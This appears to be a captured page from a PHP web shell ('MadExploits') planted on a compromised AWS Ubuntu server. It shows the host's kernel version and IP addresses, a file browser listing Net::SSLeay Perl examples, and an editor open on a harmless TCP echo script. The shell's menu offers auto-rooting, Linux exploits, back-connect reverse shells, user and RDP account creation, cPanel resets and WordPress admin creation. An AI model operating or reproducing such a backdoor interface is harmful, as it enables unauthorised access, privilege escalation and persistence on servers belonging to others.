Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.17.74.222
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libnet-ssleay-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
bio.pl
1.18
KB
-rw-r--r--
bulk.pl
1.91
KB
-rwxr-xr-x
callback.pl
3.12
KB
-rwxr-xr-x
cb-testi.pl
548
B
-rw-r--r--
cli-cert.pl
3.72
KB
-rw-r--r--
ephemeral.pl
553
B
-rw-r--r--
get_authenticated_page.pl
730
B
-rwxr-xr-x
get_page.pl
507
B
-rwxr-xr-x
get_page_cert.pl
966
B
-rw-r--r--
https-proxy-snif.pl
4.44
KB
-rwxr-xr-x
makecert.pl
1.5
KB
-rwxr-xr-x
minicli.pl
1.31
KB
-rwxr-xr-x
passwd-cb.pl
809
B
-rw-r--r--
req.conf
1.2
KB
-rw-r--r--
server_key.pem
963
B
-rw-r--r--
ssl-inetd-serv.pl
1.6
KB
-rwxr-xr-x
ssl_diff.pl
631
B
-rwxr-xr-x
sslcat.pl
526
B
-rwxr-xr-x
sslecho.pl
3.07
KB
-rwxr-xr-x
stdio_bulk.pl
2.53
KB
-rwxr-xr-x
tcpcat.pl
422
B
-rwxr-xr-x
tcpecho.pl
1.77
KB
-rwxr-xr-x
x509_cert_details.pl
9.88
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tcpecho.pl
#!/usr/bin/perl -w # tcpecho.pl - Echo server using TCP # # Copyright (c) 2003 Sampo Kellomaki <sampo@iki.fi>, All Rights Reserved. # $Id: tcpecho.pl,v 1.2 2003/08/17 07:44:47 sampo Exp $ # 17.8.2003, created --Sampo # # Usage: ./tcpecho.pl *port* # # This server always binds to localhost as this is all that is needed # for tests. die "Usage: ./tcpecho.pl *port*\n" unless $#ARGV == 0; ($port) = @ARGV; $our_ip = "\x7F\0\0\x01"; $trace = 2; use Socket; use Net::SSLeay; # # Create the socket and open a connection # $our_serv_params = pack ('S n a4 x8', &AF_INET, $port, $our_ip); socket (S, &AF_INET, &SOCK_STREAM, 0) or die "socket: $!"; bind (S, $our_serv_params) or die "bind: $! (port=$port)"; listen (S, 5) or die "listen: $!"; #while (1) { # uncomment to turn off "one shot" behaviour print "tcpecho $$: Accepting connections on port $port...\n" if $trace>1; ($addr = accept(Net::SSLeay::SSLCAT_S, S)) or die "accept: $!"; $old_out = select(Net::SSLeay::SSLCAT_S); $| = 1; select ($old_out); # Piping hot! if ($trace) { ($af,$client_port,$client_ip) = unpack('S n a4 x8',$addr); @inetaddr = unpack('C4',$client_ip); print "$af connection from " . join ('.', @inetaddr) . ":$client_port\n" if $trace;; } # # Connected. Exchange some data. # $got = Net::SSLeay::tcp_read_all() or die "$$: read failed"; print "tcpecho $$: got " . length($got) . " bytes\n" if $trace==2; print "tcpecho: Got `$got' (" . length ($got) . " chars)\n" if $trace>2; $got = uc $got; Net::SSLeay::tcp_write_all($got) or die "$$: write failed"; $got = ''; # in case it was huge print "tcpecho: Tearing down the connection.\n\n" if $trace>1; close Net::SSLeay::SSLCAT_S; #} close S; __END__
Close